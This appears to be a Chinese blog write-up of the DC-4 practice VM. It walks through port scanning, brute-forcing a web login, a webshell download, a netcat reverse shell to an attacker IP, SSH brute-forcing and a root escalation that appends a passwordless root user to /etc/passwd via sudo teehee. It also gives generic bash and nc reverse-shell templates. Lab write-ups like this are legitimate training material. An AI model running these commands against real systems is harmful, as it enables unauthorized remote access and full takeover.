DC-4靶机冲冲冲!!

前面还是老样子:使用nmap去扫描看一下开放的端口以及相对应的操作

外网打点:

命令:namp -sS 192.168.163.0-255

然后去访问一下开放的网站

收集一些信息:

后台目录扫描:(没什么有用的信息)

有登录框肯定是有密码爆破的:

我爆破了过后在回去发现可以登录上去了

看见可以执行命令,然后就进行抓包看看可以执行其他的命令不:

然后我立马就想到了dc-3的下载反弹shell的,但是这点没有成功

先上传到网站根目录在说

使用命令:wget http://192.168.163.131:8889/webshell.php

没有成功,进行下一步,直接执行反弹shell命令    nc

nc -e /bin/bash 192.168.163.131 8888稍微改一下

然后要又交互的shell还是我们的python

python -c "import pty;pty.spawn('/bin/bash')"

内网渗透:

进来了过后我们在查看一些文件,前面看了权限要进行提权的操作

先来看看suid提权的

发现都没有成功,然后在到文件进行了提示

然后找到了密码

然后我们在进行爆破ssh密码,前面看见开放了22端口的

连接上去:

查看权限

先看看find提权

查看这个的时候发现,我们有邮件

我们在查看的时候发现了邮件,然后我们去查看,发现了老板发送的文件

然后利用账号密码成功登录进入,发现还是需要提权的操作:

然后我们在像前面一样来看看suid提权的操作

还是不可以然后在查看 su-l

//列出目前用户可执行与无法执行的指令; sudo -l 查看

这个其实是可以将文件内容写入文件的,是liunx的小型编辑器

然后我们在写入一个用户具有root权限就解决了

echo "admin1::0:0:::/bin/bash" | sudo teehee -a /etc/passwd

这样的 :[注册名]:[口令]:[用户标识号]:[组标识号]:[用户名]:[用户主目录]:[命令解析程序]

我们这里是空的代表者没有密码   如果是为x就是有密码的    记住复制去掉空

然后我们在切换用户就提权成功了

但是我们要换一个用户来进行切换,charles不能切换成功换成jim用户来进行切换的操作

 

读取falg:

  • 总结:
  • 1:知道了teehee提权的操作,我们还可以写入计划任务来进行提权
  • /etc/crontab 文件,即定时任务文件
  • 2:了解了破解密码ssh等等的工具
  • 3:明白了nc来接受反弹shell的命令平常都是bash
  • netcat反弹shell命令

  • 反弹shell命令格式如下:

    bash -i >& /dev/tcp/ip/port 0>&1

nc -e /bin/bash [监听的IP] [监听的PORT]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值